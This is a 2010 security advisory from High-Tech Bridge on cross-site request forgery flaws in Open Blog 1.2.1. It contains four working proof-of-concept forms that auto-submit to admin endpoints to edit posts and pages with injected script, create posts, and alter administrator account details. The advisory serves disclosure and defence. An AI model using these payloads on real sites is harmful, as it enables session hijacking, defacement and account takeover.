Total Tests:

Cross-site Request Forgery (CSRF) in Open blog

Advisory ID:HTB22496
Product:Open Blog
Vendor:Tomaž Muraus
Vulnerable Versions:1.2.1 and probably prior
Tested Version:1.2.1
Advisory Publication:July 22, 2010 [without technical details]
Vendor Notification:July 22, 2010
Public Disclosure:August 5, 2010
Vulnerability Type:Cross-Site Request Forgery [CWE-352]
Cross-Site Request Forgery [CWE-352]
CVE References:CVE-2010-3025
CVE-2010-3026
Risk Level:Medium
CVSSv2 Base Scores:4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Discovered and Provided:High-Tech Bridge Security Research Lab
 

Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Open blog which could be exploited to perform cross-site request forgery attacks.

1) Cross-site request forgery vulnerabilities in Open blog: CVE-2010-3025
1.1 The vulnerability exists due to insufficient validation of the request origin in application/modules/admin/controllers/posts.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and publish arbitrary posts. Further exploitation might allow arbitrary HTML and script code execution in context of the vulnerable website due to insufficient sanitation of input data in the "excerpt" parameter via admin/posts/edit.
Exploitation example:
<form action="http://host/admin/posts/edit" method="post" >
<input type="hidden" name="title" value="Welcome to Open Blog" />
<input type="hidden" name="excerpt" value='Some text"><script>alert(document.cookie)</script>' />
<input type="hidden" name="content" value="" />
<input type="hidden" name="categories[]" value="1" />
<input type="hidden" name="tags" value="openblog" />
<input type="hidden" name="publish_date" value="13/07/2010" />
<input type="hidden" name="status" value="published" />
<input type="hidden" name="id" value="1" />
<input type="submit" name="submit" id="sbmtit" value="Edit &rsaquo;&rsaquo;" />
</form>
<script>
document.getElementById('sbmtit').click();
</script>

1.2 The vulnerability exists due to insufficient validation of the request origin in application/modules/admin/controllers/pages.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and publish arbitrary posts. Further exploitation might allow arbitrary HTML and script code execution in context of the vulnerable website due to insufficient sanitation of input data in the "content" parameter in via admin/pages/edit.
Exploitation example:
<form action="http://host/admin/pages/edit" method="post" >
<input type="hidden" name="title" value="open blog page title" />
<input type="hidden" name="content" value='Some page content and <script>alert(document.cookie)</script>' />
<input type="hidden" name="status" value="active" />
<input type="hidden" name="id" value="1" />
<input type="submit" name="submit" id="sbmtit" value="Edit &rsaquo;&rsaquo;" />
</form>
<script>
document.getElementById('sbmtit').click();
</script>

1.3 The vulnerability exists due to insufficient validation of the request origin in admin/posts/create. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and create arbitrary posts.
Exploitation example:
<form action="http://[host]/admin/posts/create" method="post" name="main" />
<input name="title" value="1" type="hidden" />
<input name="excerpt" value="<p>2</p>" type="hidden" />
<input name="content" value="<p>3</p>" type="hidden" />
<input name="tags" value="" type="hidden" />
<input name="publish_date" value="12/15/2010" type="hidden" />
<input name="status" value="published" type="hidden" />
<input name="allow_comments" value="1" type="hidden" />
<input name="categories[]" value="1" type="hidden" />
<input name="submit" value="Create" type="hidden" />
<input type="submit" id="btn" name="submit" value="Submit ››">
</form>
<script>
document.getElementById('btn').click();
</scri pt>


2) Cross-site request forgery (CSRF) vulnerability in Open blog: CVE-2010-3026
The vulnerability exists due to insufficient validation of the request origin in application/modules/admin/controllers/users.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and change the administrator`s credentials.
Exploitation example:
<form action="http://host/admin/users/edit" method="post" >
<input type="hidden" name="display_name" value="User" />
<input type="hidden" name="level" value="administrator" />
<input type="hidden" name="email" value="email@example.com" />
<input type="hidden" name="website" value="" />
<input type="hidden" name="msn_messenger" value="" />
<input type="hidden" name="jabber" value="" />
<input type="hidden" name="about_me" value="about_me" />
<input type="hidden" name="id" value="2" />
<input type="submit" name="submit" id="sbmtit" value="Edit &rsaquo;&rsaquo;" />
</form>
<script>
document.getElementById('sbmtit').click();
</script>

How to Detect Cross-Site Request Forgery Vulnerabilities
Website Security Test
  • GDPR & PCI DSS Test
  • Website CMS Security Test
  • CSP & HTTP Headers Check
  • WordPress & Drupal Scanning
Try For Free

Solution:
Currently we are not aware of any vendor-supplied patches or other solutions. The vendor was contacted in accordance to our Vendor Notification Policy but we didn't get any answer or feedback.


References:
[1] High-Tech Bridge Advisory HTB22496 - https://www.immuniweb.com/advisory/HTB22496 - Cross-site Request Forgery (CSRF) in Open blog
[2] Open blog - open-blog.org - Open blog is an open source blogging application written in CodeIgniter.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
Book a Call Ask a Question
Close
Talk to ImmuniWeb Experts
ImmuniWeb AI Platform
Have a technical question?

Our security experts will answer within
one business day. No obligations.

Have a sales question?
Email:
Tel: +41 22 560 6800 (Switzerland)
Tel: +1 720 605 9147 (USA)
*
*
*
Your data will stay private and confidential